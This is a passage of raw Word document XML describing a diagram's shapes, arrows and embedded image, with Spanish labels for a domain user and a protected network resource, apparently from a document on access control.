                              <a:path w="1746885" h="3855720">
                                <a:moveTo>
                                  <a:pt x="1727073" y="2460371"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1725498" y="2458339"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1707134" y="2458339"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1706892" y="2458339"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1709547" y="2459990"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1710042" y="2460371"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1710436" y="2460625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1710067" y="2460371"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1727073" y="2460371"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1746885" h="3855720">
                                <a:moveTo>
                                  <a:pt x="1746758" y="2608326"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1746377" y="2573020"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1745653" y="2553144"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1745615" y="2551811"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1745030" y="2543048"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1744522" y="2534412"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1744472" y="2533396"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1743811" y="2526157"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1737360" y="2485263"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1728495" y="2462911"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1727212" y="2460625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1710436" y="2460625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1710245" y="2460625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1713458" y="2463558"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1713649" y="2463800"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1716278" y="2467102"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1716366" y="2467356"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1729308" y="2511437"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1729346" y="2511679"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1729447" y="2512301"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1731010" y="2526157"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1731670" y="2533396"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1731772" y="2534412"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1732343" y="2542286"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1732407" y="2543048"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1732864" y="2551811"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1732940" y="2553144"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1733664" y="2572766"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1734045" y="2608326"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1733804" y="2633726"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1731772" y="2689098"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1728216" y="2749804"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1723009" y="2815463"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1716405" y="2885821"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1708683" y="2959036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1703959" y="2999270"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1699387" y="3038932"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1694307" y="3079508"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1689100" y="3120834"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1683639" y="3162985"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1677924" y="3205848"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1671955" y="3249358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1665859" y="3293541"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1659636" y="3338296"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1653286" y="3383508"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1639951" y="3475431"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1626108" y="3568941"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1612011" y="3663518"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1597533" y="3758946"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1594459" y="3779418"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1563116" y="3774681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1589278" y="3855720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1632902" y="3793883"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1638427" y="3786060"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1607032" y="3781323"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1610106" y="3760851"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1624584" y="3665397"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1638681" y="3570795"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1652524" y="3477247"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1665859" y="3385324"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1672209" y="3340062"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1678559" y="3295281"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1684655" y="3251073"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1690497" y="3207524"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1696212" y="3164649"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1701673" y="3122422"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1706880" y="3081070"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1711960" y="3040469"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1716659" y="3000718"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1721104" y="2961894"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1728978" y="2887091"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1735709" y="2816606"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1740789" y="2750693"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1744472" y="2689733"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1746504" y="2634107"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1746758" y="2608326"/>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5196798" y="2244157"/>
                            <a:ext cx="2574290" cy="1270000"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2574290" h="1270000">
                                <a:moveTo>
                                  <a:pt x="0" y="1269491"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2574035" y="1269491"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2574035" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1269491"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="9525">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="296" name="Graphic 296"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6443430" y="1692469"/>
                            <a:ext cx="76200" cy="501015"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="76200" h="501015">
                                <a:moveTo>
                                  <a:pt x="31750" y="424688"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="424688"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38100" y="500888"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="69850" y="437388"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31750" y="437388"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31750" y="424688"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="76200" h="501015">
                                <a:moveTo>
                                  <a:pt x="44450" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="31750" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31750" y="437388"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44450" y="437388"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44450" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="76200" h="501015">
                                <a:moveTo>
                                  <a:pt x="76200" y="424688"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="44450" y="424688"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44450" y="437388"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="69850" y="437388"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76200" y="42468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2B3E07" id="Group 291" o:spid="_x0000_s1026" style="position:absolute;margin-left:126.5pt;margin-top:82.15pt;width:612.3pt;height:443.1pt;z-index:-17938944;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="77762,56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B/G+ya++GuqhBlovLl/BXBP6ZrvKp6xpsWs6TeWEwzFcwvC30YEf1qouzTJkrpo+HaKu&#10;avpk+i6pdWFyhSe2laJwR3BxVOvTPJCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK&#10;KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACuj+HVi2peOtCt1BO67jY49Adx&#10;P5A1zlevfs5eGW1DxNc6xIn7ixjKIxHBlbj9F3fmKibtFsuC5pJH0hRRRXmnq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I8WeENE8d6BdaH&#10;4i0q01vR7oKJ7G+iEsMoDBgGU8HBAPPpWnbwR2sEcMMaxQxqESNBhVUDAAHYAVJRQAV8i/F39gFP&#10;EHxc1H4pfC74i6z8JvG2pqf7Rl06MTWt45I3O8ZK8tgFgSVJAOAck/XVFAHx58P/APgnxJL8UdF+&#10;Inxi+JutfFzxFojLJptvfQrb2VtIDuVvKBbOGAYAFRkZINfYdFFABRRRQAUUUUAFFFFAHzp+z9+y&#10;bP8ABH47/Fz4iS+JI9Wj8d3QuU09LQxGz/eySYL7zv8A9ZjoOlfRd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iSpKCUdX&#10;A4O05p9ABRRTHlSPG91XPTccZoAf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lPxV/ZW+Enxt1NNS8beAtI17U0UJ9ukiMVwyjorSRlWYDs&#10;CSBXq1FAHnfwn/Z4+G3wMjuV8B+DdK8NPcjbPPaQ5nlXOdrSsS5GexOK9E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">
                <v:shape id="Image 292" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:76390;height:5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">
                  <v:imagedata r:id="rId128" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 293" o:spid="_x0000_s1028" style="position:absolute;left:16534;top:32560;width:36894;height:21571;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3689350,215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" path="m,1394396l3542538,em778763,2156790l3688968,320040e" filled="f" strokecolor="#4471c4">
                  <v:stroke dashstyle="3 1"/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 294" o:spid="_x0000_s1029" style="position:absolute;left:5973;top:15492;width:17469;height:38557;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1746885,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" path="m608076,1459230r-10160,-7620l41224,2179536,16002,2160270,,2243963r76581,-37465l64592,2197354,51308,2187219,608076,1459230xem833628,2952750r-31750,l801878,1510284r-12700,l789178,2952750r-31750,l795528,3028975r31750,-63525l833628,2952750xem950976,567817r-31750,l919226,,906526,r,567817l874776,567817r38100,76200l944626,580517r6350,-12700xem1725320,2458110r-216,-279l1724025,2456434r-1270,-1651l1677365,2441346r-12510,-965l1663915,2440381r-4826,-711l1658442,2439670r-6960,-1575l1644510,2435974r-7861,-3289l1637398,2432989r-597,-304l1629283,2428621r-2883,-2032l1621790,2423414r-32843,-35611l1561592,2340991r-19939,-37846l1509268,2239772r-29388,-58687l1449451,2119249r-12573,-26162l1410716,2039112r-54483,-114300l1299210,1803908,1150239,1484757r-11430,5334l1258443,1746885r58039,123571l1344803,1930273r54483,114300l1425448,2098675r12700,26035l1450594,2150364r12319,24765l1474724,2199386r11811,23495l1509141,2267585r21209,41402l1550416,2346960r18923,34036l1596771,2417826r34671,26416l1676273,2454021r13449,431l1688452,2454452r10554,1093l1698498,2455545r4241,1066l1706537,2458110r597,229l1706664,2458110r18656,xem1727073,2460371r-1575,-2032l1707134,2458339r-242,l1709547,2459990r495,381l1710436,2460625r-369,-254l1727073,2460371xem1746758,2608326r-381,-35306l1745653,2553144r-38,-1333l1745030,2543048r-508,-8636l1744472,2533396r-661,-7239l1737360,2485263r-8865,-22352l1727212,2460625r-16776,l1710245,2460625r3213,2933l1713649,2463800r2629,3302l1716366,2467356r12942,44081l1729346,2511679r101,622l1731010,2526157r660,7239l1731772,2534412r571,7874l1732407,2543048r457,8763l1732940,2553144r724,19622l1734045,2608326r-241,25400l1731772,2689098r-3556,60706l1723009,2815463r-6604,70358l1708683,2959036r-4724,40234l1699387,3038932r-5080,40576l1689100,3120834r-5461,42151l1677924,3205848r-5969,43510l1665859,3293541r-6223,44755l1653286,3383508r-13335,91923l1626108,3568941r-14097,94577l1597533,3758946r-3074,20472l1563116,3774681r26162,81039l1632902,3793883r5525,-7823l1607032,3781323r3074,-20472l1624584,3665397r14097,-94602l1652524,3477247r13335,-91923l1672209,3340062r6350,-44781l1684655,3251073r5842,-43549l1696212,3164649r5461,-42227l1706880,3081070r5080,-40601l1716659,3000718r4445,-38824l1728978,2887091r6731,-70485l1740789,2750693r3683,-60960l1746504,2634107r254,-25781xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 295" o:spid="_x0000_s1030" style="position:absolute;left:51967;top:22441;width:25743;height:12700;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="257429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" path="m,1269491r2574035,l2574035,,,,,1269491xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 296" o:spid="_x0000_s1031" style="position:absolute;left:64434;top:16924;width:762;height:5010;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="7620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" path="m31750,424688l,424688r38100,76200l69850,437388r-38100,l31750,424688xem44450,l31750,r,437388l44450,437388,44450,xem76200,424688r-31750,l44450,437388r25400,l76200,424688xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E3CFBD8" wp14:editId="449660F0">
            <wp:extent cx="4155732" cy="338137"/>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29" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4155732" cy="338137"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC62A3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="105"/>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49280" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5811BE5D" wp14:editId="3BC0D432">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2301239</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>243713</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1630680" cy="276225"/>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276225"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="548803E9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58"/>
                              <w:ind w:left="640"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Usuario de dominio</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5811BE5D" id="Textbox 298" o:spid="_x0000_s1155" type="#_x0000_t202" style="position:absolute;margin-left:181.2pt;margin-top:19.2pt;width:128.4pt;height:21.75pt;z-index:-1566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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="548803E9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58"/>
                        <w:ind w:left="640"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Usuario de dominio</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7350E061" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00BCD464" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672CAA36" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="140"/>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49792" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F9956E8" wp14:editId="68A7ECD4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>9011411</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>266013</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2516505" cy="462280"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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6505" cy="462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="173CE51C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="784" w:hanging="389"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Objeto protegible (recursos como carpeta de red, archivo, etc.)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6F9956E8" id="Textbox 299" o:spid="_x0000_s1156" type="#_x0000_t202" style="position:absolute;margin-left:709.55pt;margin-top:20.95pt;width:198.15pt;height:36.4pt;z-index:-1566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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="173CE51C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="784" w:hanging="389"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Objeto protegible (recursos como carpeta de red, archivo, etc.)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="378AC810" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6229E913" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CDF60E1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209495EB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F482DB6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0E9B0D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5F05FC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E755A3B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5713606D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D670B05" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151E74FE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C7AF443" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F98CD4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
